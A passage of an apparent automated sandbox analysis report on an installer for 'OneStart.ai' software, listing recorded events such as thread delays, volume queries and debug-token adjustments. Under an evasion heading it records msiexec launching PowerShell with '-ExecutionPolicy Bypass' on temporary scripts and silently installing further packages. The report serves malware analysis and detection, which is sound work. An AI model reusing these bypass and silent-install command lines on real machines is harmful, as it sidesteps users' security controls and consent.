          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 910
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2369
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1392
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3359
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1962
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3038
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2555
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2709
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1810
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1590
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2179
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2102
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1517
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9362.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9362.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss14E.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss338E.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss5F45.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss68A3.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE3B5.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\OneStartBarSetup.msi" /qn
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\WCSetup_OstWC.msi" /q
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9D9A.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssDFC8.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC2FC.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss129F.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss7063.tmp.ps1"
          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\BBWC VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
